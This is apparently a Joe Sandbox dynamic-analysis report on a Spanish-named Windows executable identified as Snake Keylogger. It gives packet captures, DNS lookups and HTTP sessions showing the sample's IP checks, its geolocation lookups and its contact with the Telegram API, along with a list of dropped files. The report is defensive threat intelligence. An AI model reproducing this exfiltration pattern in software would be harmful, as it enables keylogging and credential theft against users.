Mar 13, 2025 10:07:37.525748968 CET	443	49699	104.21.112.1	192.168.2.7
Mar 13, 2025 10:07:37.578676939 CET	49698	80	192.168.2.7	158.101.44.242
Mar 13, 2025 10:07:39.293071985 CET	443	49699	104.21.112.1	192.168.2.7
Mar 13, 2025 10:07:39.294859886 CET	49699	443	192.168.2.7	104.21.112.1
Mar 13, 2025 10:07:39.294887066 CET	443	49699	104.21.112.1	192.168.2.7
Mar 13, 2025 10:07:40.016967058 CET	443	49699	104.21.112.1	192.168.2.7
Mar 13, 2025 10:07:40.041739941 CET	443	49699	104.21.112.1	192.168.2.7
Mar 13, 2025 10:07:40.041806936 CET	49699	443	192.168.2.7	104.21.112.1
Mar 13, 2025 10:07:40.042294025 CET	49699	443	192.168.2.7	104.21.112.1
Mar 13, 2025 10:07:40.046832085 CET	49700	80	192.168.2.7	158.101.44.242
Mar 13, 2025 10:07:40.051533937 CET	80	49700	158.101.44.242	192.168.2.7
Mar 13, 2025 10:07:40.051613092 CET	49700	80	192.168.2.7	158.101.44.242
Mar 13, 2025 10:07:40.051711082 CET	49700	80	192.168.2.7	158.101.44.242
Mar 13, 2025 10:07:40.056381941 CET	80	49700	158.101.44.242	192.168.2.7
Mar 13, 2025 10:07:40.623064995 CET	80	49700	158.101.44.242	192.168.2.7
Mar 13, 2025 10:07:40.624236107 CET	49701	443	192.168.2.7	104.21.112.1
Mar 13, 2025 10:07:40.624279022 CET	443	49701	104.21.112.1	192.168.2.7
Mar 13, 2025 10:07:40.624345064 CET	49701	443	192.168.2.7	104.21.112.1
Mar 13, 2025 10:07:40.624625921 CET	49701	443	192.168.2.7	104.21.112.1
Mar 13, 2025 10:07:40.624634981 CET	443	49701	104.21.112.1	192.168.2.7
Mar 13, 2025 10:07:40.672380924 CET	49700	80	192.168.2.7	158.101.44.242
Mar 13, 2025 10:07:42.378201008 CET	443	49701	104.21.112.1	192.168.2.7
Mar 13, 2025 10:07:42.380142927 CET	49701	443	192.168.2.7	104.21.112.1
Mar 13, 2025 10:07:42.380156040 CET	443	49701	104.21.112.1	192.168.2.7
Mar 13, 2025 10:07:42.884901047 CET	443	49701	104.21.112.1	192.168.2.7
Mar 13, 2025 10:07:42.884973049 CET	443	49701	104.21.112.1	192.168.2.7
Mar 13, 2025 10:07:42.885081053 CET	49701	443	192.168.2.7	104.21.112.1
Mar 13, 2025 10:07:42.888778925 CET	49701	443	192.168.2.7	104.21.112.1
Mar 13, 2025 10:07:42.991250038 CET	49702	80	192.168.2.7	158.101.44.242
Mar 13, 2025 10:07:42.991697073 CET	49700	80	192.168.2.7	158.101.44.242
Mar 13, 2025 10:07:42.996016026 CET	80	49702	158.101.44.242	192.168.2.7
Mar 13, 2025 10:07:42.996107101 CET	49702	80	192.168.2.7	158.101.44.242
Mar 13, 2025 10:07:42.996222019 CET	49702	80	192.168.2.7	158.101.44.242
Mar 13, 2025 10:07:42.996668100 CET	80	49700	158.101.44.242	192.168.2.7
Mar 13, 2025 10:07:42.996820927 CET	49700	80	192.168.2.7	158.101.44.242
Mar 13, 2025 10:07:43.001632929 CET	80	49702	158.101.44.242	192.168.2.7
Mar 13, 2025 10:07:43.577858925 CET	80	49702	158.101.44.242	192.168.2.7
Mar 13, 2025 10:07:43.579437971 CET	49703	443	192.168.2.7	104.21.112.1
Mar 13, 2025 10:07:43.579477072 CET	443	49703	104.21.112.1	192.168.2.7
Mar 13, 2025 10:07:43.579860926 CET	49703	443	192.168.2.7	104.21.112.1
Mar 13, 2025 10:07:43.579860926 CET	49703	443	192.168.2.7	104.21.112.1
Mar 13, 2025 10:07:43.579894066 CET	443	49703	104.21.112.1	192.168.2.7
Mar 13, 2025 10:07:43.625560045 CET	49702	80	192.168.2.7	158.101.44.242
Mar 13, 2025 10:07:45.400743961 CET	443	49703	104.21.112.1	192.168.2.7
Mar 13, 2025 10:07:45.405977011 CET	49703	443	192.168.2.7	104.21.112.1
Mar 13, 2025 10:07:45.406003952 CET	443	49703	104.21.112.1	192.168.2.7
Mar 13, 2025 10:07:45.938292027 CET	443	49703	104.21.112.1	192.168.2.7
Mar 13, 2025 10:07:45.938381910 CET	443	49703	104.21.112.1	192.168.2.7
Mar 13, 2025 10:07:45.938457966 CET	49703	443	192.168.2.7	104.21.112.1
Mar 13, 2025 10:07:45.943790913 CET	49703	443	192.168.2.7	104.21.112.1
Mar 13, 2025 10:07:45.970674992 CET	49702	80	192.168.2.7	158.101.44.242
Mar 13, 2025 10:07:45.971252918 CET	49704	80	192.168.2.7	158.101.44.242
Mar 13, 2025 10:07:45.975821972 CET	80	49702	158.101.44.242	192.168.2.7
Mar 13, 2025 10:07:45.975899935 CET	49702	80	192.168.2.7	158.101.44.242
Mar 13, 2025 10:07:45.975930929 CET	80	49704	158.101.44.242	192.168.2.7
Mar 13, 2025 10:07:45.976001978 CET	49704	80	192.168.2.7	158.101.44.242
Mar 13, 2025 10:07:45.980777025 CET	49704	80	192.168.2.7	158.101.44.242
Mar 13, 2025 10:07:45.985492945 CET	80	49704	158.101.44.242	192.168.2.7
Mar 13, 2025 10:07:46.838350058 CET	80	49704	158.101.44.242	192.168.2.7
Mar 13, 2025 10:07:46.840212107 CET	49705	443	192.168.2.7	104.21.112.1
Mar 13, 2025 10:07:46.840264082 CET	443	49705	104.21.112.1	192.168.2.7
Mar 13, 2025 10:07:46.840364933 CET	49705	443	192.168.2.7	104.21.112.1
Mar 13, 2025 10:07:46.840651989 CET	49705	443	192.168.2.7	104.21.112.1
Mar 13, 2025 10:07:46.840667009 CET	443	49705	104.21.112.1	192.168.2.7
Mar 13, 2025 10:07:46.891239882 CET	49704	80	192.168.2.7	158.101.44.242
Mar 13, 2025 10:07:48.602145910 CET	443	49705	104.21.112.1	192.168.2.7
Mar 13, 2025 10:07:48.604078054 CET	49705	443	192.168.2.7	104.21.112.1
Mar 13, 2025 10:07:48.604115009 CET	443	49705	104.21.112.1	192.168.2.7
Mar 13, 2025 10:07:49.128478050 CET	443	49705	104.21.112.1	192.168.2.7
Mar 13, 2025 10:07:49.154978037 CET	443	49705	104.21.112.1	192.168.2.7
Mar 13, 2025 10:07:49.155057907 CET	49705	443	192.168.2.7	104.21.112.1
Mar 13, 2025 10:07:49.155415058 CET	49705	443	192.168.2.7	104.21.112.1
Mar 13, 2025 10:07:49.159066916 CET	49704	80	192.168.2.7	158.101.44.242
Mar 13, 2025 10:07:49.160296917 CET	49706	80	192.168.2.7	158.101.44.242
Mar 13, 2025 10:07:49.164657116 CET	80	49704	158.101.44.242	192.168.2.7
Mar 13, 2025 10:07:49.164735079 CET	49704	80	192.168.2.7	158.101.44.242
Mar 13, 2025 10:07:49.164975882 CET	80	49706	158.101.44.242	192.168.2.7
Mar 13, 2025 10:07:49.165034056 CET	49706	80	192.168.2.7	158.101.44.242
Mar 13, 2025 10:07:49.165139914 CET	49706	80	192.168.2.7	158.101.44.242
Mar 13, 2025 10:07:49.169790983 CET	80	49706	158.101.44.242	192.168.2.7
Mar 13, 2025 10:07:49.736789942 CET	80	49706	158.101.44.242	192.168.2.7
Mar 13, 2025 10:07:49.738554001 CET	49707	443	192.168.2.7	104.21.112.1
Mar 13, 2025 10:07:49.738600016 CET	443	49707	104.21.112.1	192.168.2.7
Mar 13, 2025 10:07:49.738693953 CET	49707	443	192.168.2.7	104.21.112.1
Mar 13, 2025 10:07:49.738930941 CET	49707	443	192.168.2.7	104.21.112.1
Mar 13, 2025 10:07:49.738940954 CET	443	49707	104.21.112.1	192.168.2.7
Mar 13, 2025 10:07:49.781810999 CET	49706	80	192.168.2.7	158.101.44.242
Mar 13, 2025 10:07:51.489957094 CET	443	49707	104.21.112.1	192.168.2.7
Mar 13, 2025 10:07:51.491677999 CET	49707	443	192.168.2.7	104.21.112.1
Mar 13, 2025 10:07:51.491694927 CET	443	49707	104.21.112.1	192.168.2.7
Mar 13, 2025 10:07:52.029887915 CET	443	49707	104.21.112.1	192.168.2.7
Mar 13, 2025 10:07:52.029973030 CET	443	49707	104.21.112.1	192.168.2.7
Mar 13, 2025 10:07:52.030119896 CET	49707	443	192.168.2.7	104.21.112.1
Mar 13, 2025 10:07:52.030613899 CET	49707	443	192.168.2.7	104.21.112.1
Mar 13, 2025 10:07:52.034213066 CET	49706	80	192.168.2.7	158.101.44.242
Mar 13, 2025 10:07:52.039114952 CET	80	49706	158.101.44.242	192.168.2.7
Mar 13, 2025 10:07:52.039213896 CET	49706	80	192.168.2.7	158.101.44.242
Mar 13, 2025 10:07:52.043447018 CET	49708	80	192.168.2.7	158.101.44.242
Mar 13, 2025 10:07:52.048166037 CET	80	49708	158.101.44.242	192.168.2.7
Mar 13, 2025 10:07:52.048285961 CET	49708	80	192.168.2.7	158.101.44.242
Mar 13, 2025 10:07:52.048424959 CET	49708	80	192.168.2.7	158.101.44.242
Mar 13, 2025 10:07:52.053020000 CET	80	49708	158.101.44.242	192.168.2.7
Mar 13, 2025 10:07:52.661201954 CET	80	49708	158.101.44.242	192.168.2.7
Mar 13, 2025 10:07:52.662651062 CET	49709	443	192.168.2.7	104.21.112.1
Mar 13, 2025 10:07:52.662700891 CET	443	49709	104.21.112.1	192.168.2.7
Mar 13, 2025 10:07:52.662803888 CET	49709	443	192.168.2.7	104.21.112.1
Mar 13, 2025 10:07:52.663054943 CET	49709	443	192.168.2.7	104.21.112.1
Mar 13, 2025 10:07:52.663064003 CET	443	49709	104.21.112.1	192.168.2.7
Mar 13, 2025 10:07:52.703644037 CET	49708	80	192.168.2.7	158.101.44.242
Mar 13, 2025 10:07:54.496493101 CET	443	49709	104.21.112.1	192.168.2.7
Mar 13, 2025 10:07:54.498362064 CET	49709	443	192.168.2.7	104.21.112.1
Mar 13, 2025 10:07:54.498399019 CET	443	49709	104.21.112.1	192.168.2.7
Mar 13, 2025 10:07:54.937979937 CET	443	49709	104.21.112.1	192.168.2.7
Mar 13, 2025 10:07:54.938201904 CET	443	49709	104.21.112.1	192.168.2.7
Mar 13, 2025 10:07:54.938277006 CET	49709	443	192.168.2.7	104.21.112.1
Mar 13, 2025 10:07:54.938682079 CET	49709	443	192.168.2.7	104.21.112.1
Mar 13, 2025 10:07:54.941700935 CET	49708	80	192.168.2.7	158.101.44.242
Mar 13, 2025 10:07:54.942914963 CET	49710	80	192.168.2.7	158.101.44.242
Mar 13, 2025 10:07:54.946619034 CET	80	49708	158.101.44.242	192.168.2.7
Mar 13, 2025 10:07:54.946692944 CET	49708	80	192.168.2.7	158.101.44.242
Mar 13, 2025 10:07:54.947585106 CET	80	49710	158.101.44.242	192.168.2.7
Mar 13, 2025 10:07:54.947657108 CET	49710	80	192.168.2.7	158.101.44.242
Mar 13, 2025 10:07:54.947748899 CET	49710	80	192.168.2.7	158.101.44.242
Mar 13, 2025 10:07:54.952419043 CET	80	49710	158.101.44.242	192.168.2.7
Mar 13, 2025 10:07:55.511502981 CET	80	49710	158.101.44.242	192.168.2.7
Mar 13, 2025 10:07:55.513211966 CET	49711	443	192.168.2.7	104.21.112.1
Mar 13, 2025 10:07:55.513264894 CET	443	49711	104.21.112.1	192.168.2.7
Mar 13, 2025 10:07:55.513376951 CET	49711	443	192.168.2.7	104.21.112.1
Mar 13, 2025 10:07:55.513737917 CET	49711	443	192.168.2.7	104.21.112.1
Mar 13, 2025 10:07:55.513748884 CET	443	49711	104.21.112.1	192.168.2.7
Mar 13, 2025 10:07:55.563015938 CET	49710	80	192.168.2.7	158.101.44.242
Mar 13, 2025 10:07:57.278795958 CET	443	49711	104.21.112.1	192.168.2.7
Mar 13, 2025 10:07:57.280725956 CET	49711	443	192.168.2.7	104.21.112.1
Mar 13, 2025 10:07:57.280735970 CET	443	49711	104.21.112.1	192.168.2.7
Mar 13, 2025 10:07:57.801120996 CET	443	49711	104.21.112.1	192.168.2.7
Mar 13, 2025 10:07:57.801218033 CET	443	49711	104.21.112.1	192.168.2.7
Mar 13, 2025 10:07:57.801291943 CET	49711	443	192.168.2.7	104.21.112.1
Mar 13, 2025 10:07:57.801770926 CET	49711	443	192.168.2.7	104.21.112.1
Mar 13, 2025 10:07:57.926220894 CET	49710	80	192.168.2.7	158.101.44.242
Mar 13, 2025 10:07:57.931138039 CET	80	49710	158.101.44.242	192.168.2.7
Mar 13, 2025 10:07:57.931207895 CET	49710	80	192.168.2.7	158.101.44.242
Mar 13, 2025 10:07:57.938666105 CET	49712	443	192.168.2.7	149.154.167.220
Mar 13, 2025 10:07:57.938704014 CET	443	49712	149.154.167.220	192.168.2.7
Mar 13, 2025 10:07:57.938771009 CET	49712	443	192.168.2.7	149.154.167.220
Mar 13, 2025 10:07:57.946695089 CET	49712	443	192.168.2.7	149.154.167.220
Mar 13, 2025 10:07:57.946718931 CET	443	49712	149.154.167.220	192.168.2.7
Mar 13, 2025 10:07:59.898030043 CET	443	49712	149.154.167.220	192.168.2.7
Mar 13, 2025 10:07:59.898194075 CET	49712	443	192.168.2.7	149.154.167.220
Mar 13, 2025 10:07:59.900011063 CET	49712	443	192.168.2.7	149.154.167.220
Mar 13, 2025 10:07:59.900019884 CET	443	49712	149.154.167.220	192.168.2.7
Mar 13, 2025 10:07:59.900374889 CET	443	49712	149.154.167.220	192.168.2.7
Mar 13, 2025 10:07:59.901716948 CET	49712	443	192.168.2.7	149.154.167.220
Mar 13, 2025 10:07:59.944324017 CET	443	49712	149.154.167.220	192.168.2.7
Mar 13, 2025 10:08:00.578598976 CET	443	49712	149.154.167.220	192.168.2.7
Mar 13, 2025 10:08:00.622697115 CET	443	49712	149.154.167.220	192.168.2.7
Mar 13, 2025 10:08:00.622848034 CET	49712	443	192.168.2.7	149.154.167.220
Mar 13, 2025 10:08:00.643289089 CET	49712	443	192.168.2.7	149.154.167.220
Mar 13, 2025 10:08:06.329651117 CET	49698	80	192.168.2.7	158.101.44.242

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 13, 2025 10:07:21.573165894 CET	51565	53	192.168.2.7	1.1.1.1
Mar 13, 2025 10:07:21.580437899 CET	53	51565	1.1.1.1	192.168.2.7
Mar 13, 2025 10:07:24.510365009 CET	58615	53	192.168.2.7	1.1.1.1
Mar 13, 2025 10:07:24.517767906 CET	53	58615	1.1.1.1	192.168.2.7
Mar 13, 2025 10:07:30.594348907 CET	64889	53	192.168.2.7	1.1.1.1
Mar 13, 2025 10:07:30.601334095 CET	53	64889	1.1.1.1	192.168.2.7
Mar 13, 2025 10:07:31.990083933 CET	63775	53	192.168.2.7	1.1.1.1
Mar 13, 2025 10:07:31.997715950 CET	53	63775	1.1.1.1	192.168.2.7
Mar 13, 2025 10:07:52.034755945 CET	51985	53	192.168.2.7	1.1.1.1
Mar 13, 2025 10:07:52.042084932 CET	53	51985	1.1.1.1	192.168.2.7
Mar 13, 2025 10:07:57.926143885 CET	50742	53	192.168.2.7	1.1.1.1
Mar 13, 2025 10:07:57.933204889 CET	53	50742	1.1.1.1	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Mar 13, 2025 10:07:21.573165894 CET	192.168.2.7	1.1.1.1	0x2713	Standard query (0)	drive.google.com	A (IP address)	IN (0x0001)	false
Mar 13, 2025 10:07:24.510365009 CET	192.168.2.7	1.1.1.1	0x1443	Standard query (0)	drive.usercontent.google.com	A (IP address)	IN (0x0001)	false
Mar 13, 2025 10:07:30.594348907 CET	192.168.2.7	1.1.1.1	0x810f	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Mar 13, 2025 10:07:31.990083933 CET	192.168.2.7	1.1.1.1	0xb56b	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Mar 13, 2025 10:07:52.034755945 CET	192.168.2.7	1.1.1.1	0x86ff	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Mar 13, 2025 10:07:57.926143885 CET	192.168.2.7	1.1.1.1	0x9c7a	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Mar 13, 2025 10:07:21.580437899 CET	1.1.1.1	192.168.2.7	0x2713	No error (0)	drive.google.com		216.58.212.142	A (IP address)	IN (0x0001)	false
Mar 13, 2025 10:07:24.517767906 CET	1.1.1.1	192.168.2.7	0x1443	No error (0)	drive.usercontent.google.com		142.250.185.65	A (IP address)	IN (0x0001)	false
Mar 13, 2025 10:07:30.601334095 CET	1.1.1.1	192.168.2.7	0x810f	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 13, 2025 10:07:30.601334095 CET	1.1.1.1	192.168.2.7	0x810f	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Mar 13, 2025 10:07:30.601334095 CET	1.1.1.1	192.168.2.7	0x810f	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Mar 13, 2025 10:07:30.601334095 CET	1.1.1.1	192.168.2.7	0x810f	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Mar 13, 2025 10:07:30.601334095 CET	1.1.1.1	192.168.2.7	0x810f	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Mar 13, 2025 10:07:30.601334095 CET	1.1.1.1	192.168.2.7	0x810f	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Mar 13, 2025 10:07:31.997715950 CET	1.1.1.1	192.168.2.7	0xb56b	No error (0)	reallyfreegeoip.org		104.21.112.1	A (IP address)	IN (0x0001)	false
Mar 13, 2025 10:07:31.997715950 CET	1.1.1.1	192.168.2.7	0xb56b	No error (0)	reallyfreegeoip.org		104.21.80.1	A (IP address)	IN (0x0001)	false
Mar 13, 2025 10:07:31.997715950 CET	1.1.1.1	192.168.2.7	0xb56b	No error (0)	reallyfreegeoip.org		104.21.48.1	A (IP address)	IN (0x0001)	false
Mar 13, 2025 10:07:31.997715950 CET	1.1.1.1	192.168.2.7	0xb56b	No error (0)	reallyfreegeoip.org		104.21.16.1	A (IP address)	IN (0x0001)	false
Mar 13, 2025 10:07:31.997715950 CET	1.1.1.1	192.168.2.7	0xb56b	No error (0)	reallyfreegeoip.org		104.21.32.1	A (IP address)	IN (0x0001)	false
Mar 13, 2025 10:07:31.997715950 CET	1.1.1.1	192.168.2.7	0xb56b	No error (0)	reallyfreegeoip.org		104.21.64.1	A (IP address)	IN (0x0001)	false
Mar 13, 2025 10:07:31.997715950 CET	1.1.1.1	192.168.2.7	0xb56b	No error (0)	reallyfreegeoip.org		104.21.96.1	A (IP address)	IN (0x0001)	false
Mar 13, 2025 10:07:52.042084932 CET	1.1.1.1	192.168.2.7	0x86ff	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 13, 2025 10:07:52.042084932 CET	1.1.1.1	192.168.2.7	0x86ff	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Mar 13, 2025 10:07:52.042084932 CET	1.1.1.1	192.168.2.7	0x86ff	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Mar 13, 2025 10:07:52.042084932 CET	1.1.1.1	192.168.2.7	0x86ff	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Mar 13, 2025 10:07:52.042084932 CET	1.1.1.1	192.168.2.7	0x86ff	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Mar 13, 2025 10:07:52.042084932 CET	1.1.1.1	192.168.2.7	0x86ff	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Mar 13, 2025 10:07:57.933204889 CET	1.1.1.1	192.168.2.7	0x9c7a	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

drive.google.com

drive.usercontent.google.com

reallyfreegeoip.org

api.telegram.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49694	158.101.44.242	80	5272	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Mar 13, 2025 10:07:30.610275984 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Mar 13, 2025 10:07:31.378988981 CET	321	IN	HTTP/1.1 200 OK Date: Thu, 13 Mar 2025 09:07:31 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: a3c6a895c5dd42f5ba515af6cadca69c Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Mar 13, 2025 10:07:31.383553982 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Mar 13, 2025 10:07:31.543138027 CET	321	IN	HTTP/1.1 200 OK Date: Thu, 13 Mar 2025 09:07:31 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: e22a22ef2c9d92df96aa40a6a5db0296 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Mar 13, 2025 10:07:34.616857052 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Mar 13, 2025 10:07:34.777657986 CET	321	IN	HTTP/1.1 200 OK Date: Thu, 13 Mar 2025 09:07:34 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: e9f6c831b2e74e479bfc4ac4f77eee69 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49698	158.101.44.242	80	5272	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Mar 13, 2025 10:07:36.959038019 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Mar 13, 2025 10:07:37.523757935 CET	321	IN	HTTP/1.1 200 OK Date: Thu, 13 Mar 2025 09:07:37 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 7f8b1b7471281cc77f995ee291866591 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.7	49700	158.101.44.242	80	5272	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Mar 13, 2025 10:07:40.051711082 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Mar 13, 2025 10:07:40.623064995 CET	321	IN	HTTP/1.1 200 OK Date: Thu, 13 Mar 2025 09:07:40 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 5ed6ef20733649599f367d4f1ecabd86 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report justificante de transferencia09454545.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\edb.log

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gmuiusmj.ktx.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mc5341kk.ow4.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pdwkqgf3.xcs.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vcytcxtt.ul5.psm1

C:\Users\user\AppData\Local\Temp\nsmE667.tmp

C:\Users\user\AppData\Local\Temp\nstE995.tmp\nsExec.dll

C:\Users\user\AppData\Roaming\fyldepenneblkkets\fremtoning\Astringence\Dareful.ini

C:\Users\user\AppData\Roaming\fyldepenneblkkets\fremtoning\Astringence\Kwachas155\Erymanthian\Neutrophilic\folioformat.ini

Windows Analysis Report
justificante de transferencia09454545.exe